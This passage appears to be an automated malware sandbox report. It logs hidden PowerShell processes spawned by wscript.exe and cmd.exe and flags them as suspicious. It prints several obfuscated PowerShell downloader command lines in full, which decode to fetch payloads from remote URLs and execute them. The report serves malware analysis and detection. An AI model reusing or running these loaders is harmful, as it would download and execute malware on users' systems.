OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$Ovg
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.naJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,
              Suspicious powershell command line found
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc 